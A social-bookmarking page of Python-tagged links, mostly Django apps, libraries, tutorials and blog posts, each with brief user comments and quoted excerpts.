Pages tagged python:

django-reversion - Google Code

"Version control for Django models"
Reversion is an extension to the Django web framework that provides comprehensive version control facilities.
Revision control for Django models. Might be useful for those times when I forget/neglect to add to SVN.
How to Pick a Language
Interesting article about how to pick a language
computer programming langugage
Homepage of Michael Goerz » Blog Archive » Python Refcard
Python 2.5 リファレンス一覧カード
Dive into Python 3
"This site is optimized for Lynx just because fuck you. I'm told it also looks nice in graphical browsers." And PapayaWhip.
Un editor de presentaciones bastante cool
Code Like a Pythonista: Idiomatic Python
Intro to Django - Building a To-Do List - NETTUTS
Djangoを始める時 - Python Threads and the Global Interpreter Lock
interesting interesting!
oach the problem with what is now the near ubiquitous solution to the concurrency “problem”: Threads, a
more on the python-thread shennanigans. Better than most, but like many, seems to ignore GUI programming. Did webdev eat *everything* else?
Python Rocks! and other rants
Great little intro to python - SSH Programming with Paramiko | Completely Different
"Having spent a lot of time scripting around the binaries and trying to manage timeouts, standard out/in/error pipes, authentication, arguments and options all through ‘’subprocess”, ”popen2”, etc., I’m here to tell you wrapping command line binaries is prone to error, difficult to test, and painful to maintain." Tell me about it. I just about pulled my hair out trying to do sftp from a web-based script.
OpenSSH is the ubiquitous method of remote access for secure remote-machine login and file transfers. Many people — systems administrators, test automation engineers, web developers and others have to use and interact with it daily. Scripting SSH access and file transfers with Python can be frustrating — but the Paramiko module solves that in a powerful way.
Welcome to Pyevolve documentation ! — Pyevolve v0.5 documentation
Pyevolve was developed to be a complete genetic algorithm framework written in pure python.
Whoosh: a fast pure-Python search engine
Whoosh is a fast, featureful full-text indexing and searching library implemented in pure Python.
Pure-Python search
Whoosh is a fast, featureful full-text indexing and searching library implemented in pure Python. Some of Whoosh's features include: * Pythonic API. * Pure-Python. No compilation or binary packages needed, no mysterious crashes. * Fielded indexing and search. * Fast indexing and retrieval -- much faster than any other pure-Python solution. * Pluggable scoring algorithm (including BM25F), text analysis, storage, posting format, etc. * Powerful query language parsed by pyparsing. * Pure Python spell-checker (as far as I know, the only one).
Whoosh is a fast, featureful full-text indexing and searching library implemented in pure Python. Whoosh was created and is maintained by MattChaput. It was originally created for use in Side Effects Software's 3D animation software Houdini. Side Effects Software Inc. graciously agreed to open-source the code.
"Whoosh is a fast, featureful full-text indexing and searching library implemented in pure Python."
darwin's firepython at master - GitHub
Python logging console for Firebug
FirePython is a sexy Python logger console integrated into Firebug.
The Django and Ubuntu Intrepid Almanac @ Irrational Exuberance
setup a healthy environment to deploy Django
Including nginx
Great guide to setting up django on ubuntu with nginx, apache, postgres, memcached, and git.
Open Source - The Washington Times - Home
The Washington Times has always focused on content. After careful review, we determined that the best way to have the top tools to produce and publish that content is to release the source code of our in-house tools and encourage collaboration.
* django-projectmgr, a source code repository manager and issue tracking application. It allows threaded discussion of bugs and features, separation of bugs, features and tasks and easy creation of source code repositories for either public or private consumption. * django-supertagging, an interface to the Open Calais service for semantic markup. * django-massmedia, a multi-media management application. It can create galleries with multiple media types within, allows mass uploads with an archive file, and has a plugin for fckeditor for embedding the objects from a rich text editor. * django-clickpass, an interface to the OpenID service that allows users to create an account with a Google, Yahoo!, Facebook, Hotmail or AIM account.
The source code is released under the permissive Apache License, version 2.0. The initial tools released are: * django-projectmgr, a source code repository manager and issue tracking application. It allows threaded discussion of bugs and features, separation of bugs, features and tasks and easy creation of source code repositories for either public or private consumption. * django-supertagging, an interface to the Open Calais service for semantic markup. * django-massmedia, a multi-media management application. It can create galleries with multiple media types within, allows mass uploads with an archive file, and has a plugin for fckeditor for embedding the objects from a rich text editor. * django-clickpass, an interface to the OpenID service that allows users to create an account with a Google, Yahoo!, Facebook, Hotmail or AIM account.
How to build a Facebook app in Django — The Uswaretech Blog - Django Web Development
facebook, django
Course Information | Introduction to Compilers
siek! Free!
Writing Blazing Fast, Infinitely Scalable, Pure-WSGI Utilities - Die in a Fire - Eric Florenzano’s Blog
Sexy Lexing with Python | Evan Fosmark
Lexical analysis, a daunting task right? Wrong! In the following document we'll walk through different methods of lexical scanning in Python. First, we'll look
PyBrain is a modular Machine Learning Library for Python. It's goal is to offer flexible, easy-to-use yet still powerful algorithms for Machine Learning Tasks and a variety of predefined environments to test and compare your algorithms.
flashbake « Bit Bucket Labs
a seamless source control tool for ordinary people.
cory doctorow's hyper texty tool
"a seamless source control tool for ordinary people"
Using Git to track and version your writing.
How FriendFeed uses MySQL to store schema-less data - Bret Taylor's blog
Interesting article about MySQL scalability problems.
inky's see at master - GitHub
Une bonne alternative à dir() en Python is an interactive-only replacement for dir()
pretty dir()
An alternative to Python's dir(). Easy to type; easy to read! For humans only.
Plurk Open Source - LightCloud - Distributed and persistent key value database
aid, here is what it takes to do 10.000 gets and sets:
HowFriendFeedUsesMySqlToStoreSchemaLessData - FriendFeed では MySQL を使いどのようにスキーマレスのデータを保存しているのか
So you want a dynamic form
super(ContactForm, self).__init__(*args, **kwargs)
Jonathan Ellis's Programming Blog - Spyced: All you ever wanted to know about writing bloom filters
RPyC: Unbounded Computing
dynamic nature, to overcome the physical boundaries between processes and computers, so that remote objects can be manipulated as if they were local.
An RPC for python to build cloud and distributed systems
remote procedure calls in python, build a simple distributed computing platform
Django Settings Tip - Setting Relative Paths | Morethanseven
helpful config tip on paths w/in a site
Parasite is a debugging and development tool that runs inside your GTK+ application's process. It can inspect your application, giving you detailed information on your UI, such as the hierarchy, X window IDs, widget properties, and more. You can modify properties on the fly in order to experiment with the look of your UI.
Something that looks like it will make GUI development 30% less painful.
The Evolution of Python 3 - O'Reilly Broadcast
Landon Fuller
The DNS Dead Drop Storing Arbitrary Messages in Remote DNS Caches A few months ago, I read Dan Kaminsky's presentation slides, Attacking Distributed Systems: The DNS Case Study. In the presentation, Kaminsky documents a method of implementing single bit data transfer with nothing more than: * A recursive, caching name server * A wildcard zone After a particularly stressful week, I decided I needed to work on something fun -- an implementation of a DNS-based dead drop messaging system, utilizing Kaminsky's ideas.
DNS Dropzone Storing Arbitrary Messages in Remote DNS Caches A few months ago, I read Dan Kaminsky's presentation slides, Attacking Distributed Systems: The DNS Case Study. In the presentation, Kaminsky documents a method of implementing single bit data transfer with nothing more than:
DNS Dead Drop
The DNS Dead Drop
Python Cheat Sheet - Cheat Sheets - Added Bytes
python language references
jaikuengine - Google Code
JaikuEngine is a social microblogging platform that runs on AppEngine. JaikuEngine powers
Run Jaiku locally or on GAE
The source for the Django app jaiku, which runs on the google appengine.
JaikuEngine is a social microblogging platform that runs on AppEngine.
Concurrence — Concurrence Framework v0.3 documentation
Concurrence is a framework for creating massively concurrent network applications in Python.
Concurrence is a framework for creating massively concurrent network applications in Python. It takes a Lightweight-tasks-with-message-passing approach to concurrency. The goal of Concurrence is to provide an easier programming model for writing high performance network applications than existing solutions (Multi-threading, Twisted, asyncore etc).
Concurrence is a framework for creating massively concurrent network applications in Python. It takes a Lightweight-tasks-with-message-passing approach to concurrency.
Super duper thingy
In search of the click track « Music Machinery
Can Rhythmic Analysis Demonstrate the Use of Robotic Beats?
I’ve always been curious about which drummers use a click track and which don’t, so I thought it might be fun to try to build a click track detector using the Echo Nest remix SDK ( remix is a Python library that allows you to analyze and manipulate music). In my first attempt, I used remix to analyze a track and then I just printed out the duration of each beat in a song and used gnuplot to plot the data. The results weren’t so good - the plot was rather noisy. It turns out there’s quite a bit of variation from beat to beat. In my second attempt I averaged the beat durations over a short window, and the resulting plot was quite good.
How-to: Deploying PyQt applications on Windows and Mac OS X - Ars Technica
Fortunately, there are cross-platform Python bindings for Qt. The downside, however, is that packaging PyQt applications so that they can be deployed to users on Windows and Mac OS X is an immensely frustrating and arcane process. I declared victory last week after spending several hours battling with MacPorts and distutils. Now that I have unlocked the toolkit's dark mysteries, I can show you the hidden secrets that will allow you to achieve mastery of the alchemical art of cross-platform PyQt application deployment.
Ars delves into the arcane depths of cross-platform application deployment in this detailed tutorial which will teach you how to package PyQt software for Windows and Mac OS X.
Less Than Dot - Blog - Collection Of Puzzles For Programmers
Less Than Dot - Blog - Collection Of Puzzles For Programmers
Programming demi-gods exchange lines of brilliance. Read and expand your mind.
Real World Django
more application frameworks need a page like this. how to make it go. - added by harper reed's google reader
Really good talk summarizing Django best practices.
Longest common subsequence
Starting with a list of runners ordered by finishing time, select a sublist of runners who are getting younger. What is the longest such sublist?
Longest common subsequence
Taking a brief step back, this article is the third of a series. In the first episode we posed a puzzle: Starting with a list of runners ordered by finishing time, select a sublist of runners who are getting younger. What is the longest such sublist? In the second episode we coded up a brute force solution which searched all possible sublists to find an optimal solution. Although the code was simple and succinct, its exponential complexity made it unsuitable for practical use. In this episode we’ll discuss an elegant algorithm which solves our particular problem as a special case. On the way we’ll visit dynamic programming, Python decorators, version control and genetics.
Create a new social networking site in few hours using pinax platform (django). — The Uswaretech Blog - Django Web Development
An interesting talk on reusable apps and an article on installing Pinax
Introducing JSON Template
This could be it: declarative, no control flow, not another programming language masquerading as a template language, small, nice JSON synergy. To be checked out.
Google searches for holy grail of Python performance - Ars Technica
Google's Python engineers have launched a new project called Unladen Swallow that seeks to improve the performance of the Python programming language. One of the project's goals is to replace the Python virtual machine with an LLVM-based JIT.
Google's Python engineers have launched a new project called Unladen Swallow, which aims to bring a major performance boost to the Python programming language by making runtime speed five times faster. The project is being implemented as a branch of the conventional CPython runtime and will be fully source-compatible with regular Python applications and native extensions. This will make it possible to eventually merge the improvements into Python trunk. The goal of the Unladen Swallow project is to use LLVM, the Low Level Virtual Machine compiler infrastructure, to build a just-in-time (JIT) compilation engine that can replace Python's own specialized virtual machine. This approach offers a number of significant advantages. As the developers describe in the project plan, the project will make it possible to transition Python to a register-based virtual machine and will pave the way for future optimizations. Adopting LLVM could also potentially open the door for more seamlessly integr
Google's Python engineers have launched a new project called Unladen Swallow, which aims to bring a major performance boost to the Python programming language by making runtime speed five times faster.
< H X A 7 2 4 1 > : MiniLight minimal global illumination renderer
illumination renderer
A global illumination renderer written in several languages for comparison.
Interesting raytracer written in Scala, OCaml, Python, Ruby, Lua, Flex, and C++
Easy AI with Python (#115) - PyCon 2009 - Chicago - A Conference for the Python Community
Survey several basic AI techniques implemented with short, open-source Python code recipes. Appropriate for educators and programmers who want to experiment with AI and apply the recipes to their own problem domains. For each technique, learn the basic operating principle, discuss an approach using Python, and review a worked out-example. We'll cover database mining using neural nets, automated categorization with a naive Bayesian classifier, solving popular puzzles with depth-first and breath-first searches, solving more complex puzzles with constraint propagation, and playing a popular game using a probing search strategy.
Probably the most beautiful code I have ever seen. Lovely algorithms in elegant style. "Survey several basic AI techniques implemented with short, open-source Python code recipes. Appropriate for educators and programmers who want to experiment with AI and apply the recipes to their own problem domains. For each technique, learn the basic operating principle, discuss an approach using Python, and review a worked out-example. We'll cover database mining using neural nets, automated categorization with a naive Bayesian classifier, solving popular puzzles with depth-first and breath-first searches, solving more complex puzzles with constraint propagation, and playing a popular game using a probing search strategy."
Some AI examples made in Python. Discusses the AI techniques and the code.
Django Best Practices — Django Best Practices
Django Best Practices This is a living document of best practices in developing and deploying with the Django Web framework. These should not be seen as the right way or the only way to work with Django, but instead best practices we’ve honed after years of working with the framework. It is a fork of the great django-reusable-app-docs project started by Brian Rosner and Eric Holscher regarding best practices for writing and maintaining reusable Django apps.
hatful of hollow - Visualising Sorting Algorithms
via the cairo graphics lib, see
Cool, visual, way of showing sorting algoriothmsw
Static images of sorting algorithms, pretty neat!
"This whole thing started partly as an excuse to get familiar with the Cairo graphics library. It produces beautiful, clean images, and appears to be both portable and well designed. It also comes with a set of Python bindings that are maintained as part of the project itself - a big plus in my books. Firefox 3 will use Cairo as its standard rendering back end, which will instantly make it one of the most widely used vector graphics libraries out there. "
I dislike animated sorting algorithm visualisations - there's too much of an air of hocus-pocus about them. Something impressive and complicated happens on screen, but more often than not the audience is left mystified. I think their creators must also know that they have precious little explanatory value, because the better ones are sexed up with play-by-play doodles, added, one feels, as an apologetic afterthought by some particularly dorky sportscaster. Nevertheless I've been unable to find a single attempt to visualise a sorting algorithm statically (if you know of any, please drop me a line). So, presented below are the results of a pleasant evening with some nice Scotch and the third volume of Knuth. First, here's a taster - a static visualisation of heapsort: Heapsort I think these simple static visualisations are much clearer than most animated attempts - and they have the added benefit of also being, to my not entirely unbiased eye, rather beautiful.
I think these simple static visualisations are much clearer than most animated attempts - and they have the added benefit of also being, to my not entirely unbiased eye, rather beautiful.
Writing a Package in Python :: Brenelz's Web Development Tips :: Website Design Winnipeg
# To shorten the time needed to set up everything before starting the real work, in other words the boiler-plate code # To provide a standardized way to write packages # To ease the use of a test-driven development approach # To facilitate the releasing process
A Curious Course on Coroutines and Concurrency
เหมือนจะน่าสนใจ เก็บไว้ก่อน
Tropo is cloud-based telephony. Using our simple API you can quickly create and deploy powerful telephony applications in Groovy, JavaScript, PHP, Python, and Ruby. Tropo is powered by Voxeo - the largest and most reliable hosted telephony platform in the world.
What is Tropo is cloud-based telephony. Using our simple API you can quickly create and deploy powerful telephony applications in Groovy, JavaScript, PHP, Python, and Ruby. Tropo is powered by Voxeo - the largest and most reliable hosted telephony platform in the world. Tropo is currently in BETA and will always be absolutely free for development use. After the BETA, production use will start at $0.03 per minute. If you encounter any problems whatsoever during testing, please contact us via the help menu above. Thanks and happy Tropoing! Sample Code Here's a simple JavaScript example that shows you how to, well, you know. answer(); say("Hello, world!"); hangup(); The following JavaScript example demonstrates how to ask a caller for input: answer(); result = ask("For sales, press 1. For support, press 2.", {choices:"1, 2", repeat:3}); if ( == 'choice') { if (result.value == "1") say("sales is not available right now."); if (result.value == "2")
ProjectPlan - unladen-swallow - Plans for optimizing Python - Google Code
Où l'on voit apparaître le verbe "to desugar"
Developing Django apps with zc.buildout
So, here’s how build, test, and distribute a reusable Django app using Buildout, with every step along the way explained in excruciating detail.
Haystack - Search for Django
Will need eventually to replace __istartswith
Search doesn't have to be hard. Haystack lets you write your search code once and choose the search engine you want it to run on. With a familiar API that should make any Djangonaut feel right at home and an architecture that allows you to swap things in and out as you need to, it's how search ought to be.
Modular Search for Django
Haystack is a modular search framework for Django. It works directly with Django Models and provides a familiar API to people who are comfortable with Django.
RestfulX Framework
framework restfull para desarrollar aplicaciones flex
RESTful Flex Development
pysmell - Google Code
python completion for IDE including Emacs
python autocomplete for vim
Code Project: Build an Ncurses UI with Python | TuxRadar
Picture the scene: you're logged into a remote server via SSH, or you've installed a new graphics card and you're left staring at the command line. You need to enter a command, but you can't remember the zillion options that go along with it. You're stuck - all you can do is consult the manual pages and pore through pages of waffl
Patrick F. Spear » Projects » gcalcron
jespern / django-piston / wiki / Home —
RESTful framework for Django
jespern / django-piston / wiki / Home —
A tool for creating RESTful APIs in Django.
Get the latest version (0.1) here. A mini-framework for Django for creating RESTful APIs. Piston is a relatively small Django application that lets you create application programming interfaces (API) for your sites. It has several unique features: * Ties into Django's internal mechanisms. * Supports OAuth out of the box (as well as Basic/Digest or custom auth.) * Doesn't require tying to models, allowing arbitrary resources. * Speaks JSON, YAML, Python Pickle & XML (and HATEOAS.) * Ships with a convenient reusable library in Python * Respects and encourages proper use of HTTP (status codes, ...) * Has built in (optional) form validation (via Django), throttling, etc. * Stays out of your way. Piston logo NB: OAuth ships with piston for now, but you are not required to use it. It simply provides some boilerplate in case you want to use it later (consumer/token models, urls, etc.) Documentation o Piston Documentation + Gett
Mercurial hosting - we're here to serve.
REST worst practices
A few weeks ago, I sent the following in a email to a co-worker asking for input on designing REST APIs in Django. Since then, I’ve quoted myself a few times; I thought these thoughts would be worth a (slightly edited) public home. I think the best way to dive in terms of mistakes to avoid. If you poke around you’ll find a couple-three different stabs at writing a generic REST API module for Django. So, with no further ado, some REST “worst practices:”
REST worst practices
A few weeks ago, I sent the following in a email to a co-worker asking for input on designing REST APIs in Django. Since then, I’ve quoted myself a few times; I thought these thoughts would be worth a (slightly edited) public home. I think the best way to dive in terms of mistakes to avoid. If you poke around you’ll find a couple-three different stabs at writing a generic REST API module for Django. So, with no further ado, some REST “worst practices:” Conflating models and resources In the REST world, the resource is key, and it’s really tempting to simply look at a Django model and make a direct link between resources and models — one model, one resource. This fails, though, as soon as you need to provide any sort of aggregated resource, and it really fails with highly denormalized models. Think about a Superhero model: a single GET /heros/superman/ ought to return all his vital stats along with a list of related Power objects, a list of his related Friend objects, etc. So the dat
Lord of the REPLs
supports multiple languages but still kinda alpha
Shell pour les langages scriptés (dont Scheme, Scala, et Python)
Nimrod Programming Language
This page is about the Nimrod programming language, which combines Lisp's power with Python's readability and C's performance.
Nimrod Programming Language - efficient, expressive, elegant, statically typed, imperative, procedural, object-oriented, functional and generic
Nimrod is a new statically typed, imperative programming language, that supports procedural, object oriented, functional and generic programming styles while remaining simple and efficient. A special feature that Nimrod inherited from Lisp is that Nimrod's abstract syntax tree (AST) is part of the specification - this allows a powerful macro system which allows domain specific languages. Nimrod is a compiled, garbage-collected systems programming language which has an excellent productivity/performance ratio. Nimrod's design focuses on the 3E: efficiency, expressiveness, elegance (in the order of priority)...
Nimrod is a new statically typed, imperative programming language, that supports procedural, object oriented, functional and generic programming styles while remaining simple and efficient. A special feature that Nimrod inherited from Lisp is that Nimrod's abstract syntax tree (AST) is part of the specification - this allows a powerful macro system which allows domain specific languages.
A Detailed Django Tutorial: Blog Basics Part I :: Brenelz's Web Development Tips :: Winnipeg Web Development
Lamson: Lamson The Python SMTP Server
Lamson’s goal is to put an end to the hell that is “e-mail application development”. Rather than stay suck in the 1970’s, Lamson adopts modern web application framework design and uses a proven scripting language (Python).
"Pipes and aliases are so 1970. -- Lamson’s goal is to put an end to the hell that is “e-mail application development”. Rather than stay suck in the 1970’s, Lamson adopts modern web application framework design and uses a proven scripting language (Python)."
Lamson The Python SMTP Server
Django tip: Caching and two-phased template rendering |
Django tip: Caching and two-phased template rendering
It's a clever solution because you end up defining what doesn't get cached instead of what does get cached.
djng—a Django powered microframework
Intrigued by microframeworks.
The trickiest problem I still need to solve is how to replace A group of developers (including Adrian, Armin, Alex and myself) had an excellent brainstorming session at EuroDjangoCon about this. We realised that most of the stuff in can be recast as configuring services which Django makes available to the applications it is hosting.
I like the idea of a one-file microframework for websites. It is like SQLite instead of a fullfledged DBMS.
Simon Willison on his __djng microframework__ (which depends on Django). I share his hatred for and I'll be keeping an eye on this one.
Add Full-Text Search to your Django project with Whoosh
Whoosh is a pure-python full-text indexing and searching library. Whoosh was opensourced recently and makes it easy to add a fulltext search to your site without any external services like Lucene or Solr for example. Whoosh is pretty flexible, but to keep it simple let's assume that the index is stored in settings.WHOOSH_INDEX (which should be a path on the filesystem) and that our application is a Wiki and we want to search the Wiki pages. Indexing Documents Before we can query the index we have to make sure that the documents are indexed properly and automatically. It doesn't matter if you put the following code into a new app or an existing app. You only have to make sure, that it lives in a file, which is loaded by Django when the process starts, resonable places would be the or the file (or any file imported in those of course) in any app. The following code listing is interrupted by short explanaitions but should be saved into one file: import os from dj
Add Full-Text Search to your Django project with Whoosh
B木 - naoyaのはてなダイアリー
ハードディスクのような遅い記憶装置にはB-treeが、SSDのような速い記憶装置にはSuffix Arrayが適しているという論。
VIM as Python IDE | Alain M. Lafon
Finding the perfect IDE for Python isn’t an easy feat. There are a great many to chose from, but even though some of them offer really nifty features, I can’t help myself but feel attracted to VIM anyway. I feel that no IDE accomplishes the task of giving the comfort of complete power over the code - something is always missing out. This is why I always come back to using IDLE and VIM. Those two seem to be best companions when doing some quick and agile hacking - but when it comes to managing bigger and longer term projects, this combo needs some tweaking. But when it’s done, VIM will be a powerful IDE for Python - including code completion(with pydoc display), graphical debugging, task-management and a project view.
Excellent guide to get VIM going as a good IDE, especially for Python.
Hg-Git Mercurial Plugin
ability to push to and pull from a Git server repository from Hg
[extensions] hgext.bookmarks = hgext.hg-git = [path-to]/hg-git
Dev Explorer - Reading and Writing to Excel Spreadsheets in Python
An introduction to using the xlwt and xlrd modules for python to interact with Microsoft Excel spreadsheets.
Create Python GUIs using HTML HOWTO
This howto is about using HTML and associated web technologies (JavaScript, CSS, JSON, ...) to create a GUI for a standalone application in Python.
Python Package Index : python-daemon 1.4.5
A library implementing PEP 3143 for creating well-behaved Unix daemon processes
This library implements the well-behaved daemon specification of PEP 3143, "Standard daemon process library". A well-behaved Unix daemon process is tricky to get right, but the required steps are much the same for every daemon program. A DaemonContext instance holds the behaviour and configured process environment for the program; use the instance as a context manager to enter a daemon state.
Nice framework for building daemons in python
Django snippets: Smart {% if %} template tag
While retaining current Django functionality, it also handles equality, greater than and less than operators.
A replacement if tag for django that does what if tags should.
Hivelogic - Backing Up Flickr
This is a page titled Backing Up Flickr, written on 05 June 2009 by Dan Benjamin, and tagged with article, Efficiency, Photography, Software, Tips and Tricks, Tutorials.
The script will open your default web browser, allowing you to authorize FlickrTouchr to access your library, and will commence downloading every photograph you’ve uploaded, organizing them into folders by set, and using hard-links to save space.
Google Open Source Blog: Introducing Android Scripting Environment
These scripts demonstrates several of the available APIs available for both Lua and Python. It is intended to be run as a service and silences the ringer when the phone is placed face down. For some scripting languages, like BeanShell, it's possible to access Android's Java API directly. To simplify things, ASE provides the AndroidFacade class. For other languages, like Python and Lua, the API is made available via JSON RPC calls to a proxy. Naturally this means that only the part of the API which has been wrapped by the AndroidFacade and AndroidProxy are available to cross-compiled interpreters like Python and Lua. Thankfully, both AndroidFacade and AndroidProxy are simple to extend.
Programming Android with scripting languages like Lua or Python.
Android apps for the rest of us? Now script Android apps in Python!
android-scripting - Google Code
python for android
Camelot – Trac
A python GUI framework on top of Sqlalchemy and PyQt, inspired by the Django admin interface. Start building desktop applications at warp speed, simply by adding some additional information to you model definition.
A python GUI framework on top of Sqlalchemy and PyQt - So you want to use python on the mac?
virtualenvwrapper virtualenv
In a complete tangent from my numerous other projects, I’ve had a few people ask me recently about python on the mac, how to get started/etc.
celery - Distributed Task Queue for Django. — Celery v0.3.5 (unstable) documentation
celery is a distributed task queue framework for Django. It is used for executing tasks asynchronously, routed to one or more worker servers, running concurrently using multiprocessing.
bpython - fancy curses interface to the Python interpreter
bpython is a fancy interface to the Python interpreter for Unix-like operating systems.
Syntaxhighlighting, Autocomplete, etc.
Python Tutorial
The EveryBlock source code is an experimental news Web site that provides information at a "microlocal" level — by neighborhood or city block. It was funded by a grant from Knight Foundation, which requires the site's backend code to be open-sourced. Here is the code.
Index — Django Design Patterns
Tips on using python's datetime module
Python's datetime module is one of those bits of code that tends not to do what one would expect them to do.
Python's datetime module is one of those bits of code that tends not to do what one would expect them to do. I have come to adopt some extra usage guidelines in order to preserve my sanity:
Important timezone brokenness in Python. PHP5's DateTime continues to be my gold standard for timezone wrangling.
Tips on using python's datetime module
Tools of the Modern Python Hacker: Virtualenv, Fabric and Pip
Geraldo Reports Engine
Reports engine for Python
Geraldo is a reports engine for Python or Django applications. It uses the power of ReportLab and PIL to generate reports with page header and footer, child bands, report begin and summary bands, agreggation and graphic elements, etc
"Geraldo is a reports engine for Python or Django applications. It uses the power of ReportLab and PIL to generate reports with page header and footer, child bands, report begin and summary bands, agreggation and graphic elements, etc."
Stephen Marsland
Stephen Marsland, Massey University
"I've written a textbook ... there are lots of Python code examples in the book, and the code is available here."
Machine Learning: An Algorithmic Perspective
"I've written a textbook entitled "Machine Learning: An Algorithmic Perspective". It will be published by CRC Press, part of the Taylor and Francis group, on 2nd April 2009. The book is aimed at computer science and engineering undergraduates studing machine learning and artificial intelligence. There are lots of Python code examples in the book, and the code is available here. Where special datasets are used they are provided with the code, and there are links to additional datasets at the bottom of the page."
neatx - Google Code
Neatx is an Open Source NX server, similar to the commercial NX server from NoMachine.
Wow, Google just launched an opensource alternative to the proprietary NX server and the FreeNX opensource server that has been bitrotting for a while now. NX is awesome by the way.
KeepNote: Note taking and organization
Note taking and organization
programma per prendere appunti
Django in the Real World
A talk given at OSCON 2009 on July 21st, 2009.
This tutorial examines how best to cope when the Real World intrudes on your carefully designed website.
There’s plenty of material (documentation, blogs, books) out there that’ll help you write a site using Django… but then what? You’ve still got to test, deploy, monitor, and tune the site; failure at deployment time means all your beautiful code is for naught. This tutorial examines how best to cope when the Real World intrudes on your carefully designed website.
The idea of the "Mathesaurus" is to provide a quick reference for switching to open-source mathematical computation environments for computer algebra, numeric processing and data visualisation.
"The idea of the "Mathesaurus" is to provide a quick reference for switching to open-source mathematical computation environments for computer algebra, numeric processing and data visualisation."
libcloud python library - a unified interface cloud server providers
Une librairie pour gérer différents fournisseurs de cloud
Scripting the World Wide Computer is getting easier and more standardized.
Eli Bendersky’s website » Blog Archive » A year with Python
# A converter between binary data description formats, such as Intel HEX. # Several versions of a recursive-descent parser for a simple language # Many scripts for Scite # At work I’ve developed a framework for using Python for verification of VHDL models. Python is used to write the test scenarios and generate VHDL testbenches from them. # A few applications for controlling embedded hardware via the serial port (with elaborate wxPython & PyQt GUIs) # A few applications for analyzing test reports and building summaries in a user-friendly format # A complex multi-threaded web-page download and analysis program for my own use # A couple of games: a Tetris clone with wxPython and a small game with Pygame as part of a tutorial # Analysis of numeric data with matplotlib # Parts of an assembler and linker for a synthetic language # Solved dozens of Project Euler problems, all in Python.
MIX Online's Gestalt: Write Ruby, Python and XAML in your HTML pages.
pygowave-server - Google Code
@newsycombinator: "Open Source, compliant Google Wave Server" (from
googlewave independent server implementation
The Python Google Wave Server.
fabricate - Project Hosting on Google Code
fabricate is a build tool that finds dependencies automatically for any language
Uses file access times or strace to autodetect dependencies.
fabricate is a build tool that finds dependencies automatically for any language. It's small and just works. No hidden stuff behind your back. It was inspired by Bill McCloskey's make replacement, memoize, but fabricate works on Windows as well as Linux.
minimalist make replacement
Build automation dependency checking and fulfilling.
How to build a desktop WYSIWYG editor with WebKit and HTML 5 - Ars Technica
Very impressive. 200 LOC.
Simple tutorial about webkit/pygtk!
Fabric, Django, Git, Apache, mod_wsgi, virtualenv and pip deployment | Morethanseven
the stack I _should_ be using.
iBanjo » Blog Archive » a Mercurial “super client”
hgsubversion installation guide
List of freely available programming books - Stack Overflow
free programming books
List of freely available programming books - Stack Overflow
A Django deployment guide for Ubuntu | Ventanazul
A learning environment for Python suitable for beginners and children, inspired by Logo.
A logo like environment for learning python
Install Django, GeoDjango, PostgreSQL & PostGIS on OSX Leopard
HOWTO script
Geohacking fun
Develop Twitter API application in django and deploy on Google App Engine — The Uswaretech Blog - Django Web Development
Useful, quick and easy walkthrough of writing a Python/Django app which interfaces with Twitter, and deploying it to Google AppEngine.
Twitter’s robust REST API enables building of good applications that leverage its increasingly large and real-time data. Google’s cloud system App Engine not only provides a scalable platform for deploying applications, but also proves to be economically viable because of its pay per resource usage model and a large free quota. Little wonder then, there are increasingly large number of twitter apps being deployed on App Engine. In this post, I am going to examine how to create a simple application based on twitter’s REST API and deploy it on Google App Engine. A deployed version can be found on Twitter-Follow. The specification is simple. It finds if a twitter user is following another twitter user, given their user names. The application is developed using django and deployed on Appengine using the app engine patch project. The code is open sourced with GPL v3 and can be checked out from Google Code. Lets get started building this application.
LShift Ltd. » Tracing Python memory leaks
Google App Engineのtips集 - スティルハウスの書庫
これはよさげ gae
"Datastoreのtips * Bigtableの内部構造 * BigtableによるDatastoreの実装 * Datastoreによるクエリの実装 * トランザクションとエンティティグループ * Datastoreのtips * List Proprtyとmerge joinの使い方"
Apolitically Incorrect » Time Drive
PySide – Python for Qt
The PySide project provides LGPL-licensed Python bindings for the Qt cross-platform application and UI framework. PySide Qt bindings allow both free open source and proprietary software development and ultimately aim to support all of the platforms as Qt itself.
LGPL licenced
OpenShot Video Editor
OpenShot is just a Python program, so we just need 1 installer for that. Check. x264, Frie0r, FFmpeg, and MLT. That's 4 more. Check. Now, since these "dependency" packages are not Python, we need to be sure and build these 4 packages against the following versions of Ubuntu: * 32 Bit - Ubuntu 8.04
Easy to use, open-source, non-linear video editor for Linux
DryDrop is a tool that lets you host your static site on Google App Engine and update it by pushing to GitHub.
Host your static site on Google App Engine and update it by pushing to GitHub.
DryDrop is a tool that lets you host your static site on Google App Engine and update it by pushing to GitHub. Thanks to GitHub post-receive hooks your App Engine site can be updated automatically when you push new content.
Host static web sites on Google App Engine managed by Git
Django-SocialAuth - Login via twitter, facebook, openid, yahoo, google using a single app. — The Uswaretech Blog - Django Web Development
Here is an app to allow logging in via twitter, facebook, openid, yahoo, google, which should work transparently with Django authentication system.
TL;DR version: Here is an app to allow logging in via twitter, facebook, openid, yahoo, google, which should work transparently with Django authentication system. (@login_required, User and other infrastructure work as expected.) Demo and Code.Longer version follow:
Graham Dumpleton: Load spikes and excessive memory usage in mod_python.
A common complaint about mod_python is that it uses too much memory and can cause huge spikes in processor load. Fact is that this isn't really caused by mod_python itself, but indirectly by virtue of how, or more so how not, Apache has been configured for the type of web application that is being run.
Some have realised that mod_wsgi daemon mode seems to offer a more predictable memory usage profile and performance curve and as a result fervently recommend it, but at the same time they still don't seem to understand what the problems with embedded mode, as outlined above actually were. So, hopefully the explanation above will help in clearing up why, not just in the case of mod_wsgi daemon mode vs mod_wsgi embedded mode, but also for the much maligned mod_python.
out of date, hence the mod_python, but the apache conf still applies
Stephen Marsland
I've written a textbook entitled "Machine Learning: An Algorithmic Perspective". It will be published by CRC Press, part of the Taylor and Francis group, on 2nd April 2009. The book is aimed at computer science and engineering undergraduates studing machine learning and artificial intelligence.
I've written a textbook entitled "Machine Learning: An Algorithmic Perspective". It will be published by CRC Press, part of the Taylor and Francis group, on 2nd April 2009. The book is aimed at computer science and engineering undergraduates studing machine learning and artificial intelligence. There are lots of Python code examples in the book, and the code is available here.
Machine Learning: An Algorithmic Perspective
Python codes from a textbook entitled "Machine Learning: An Algorithmic Perspective"
by Stephen Marsland
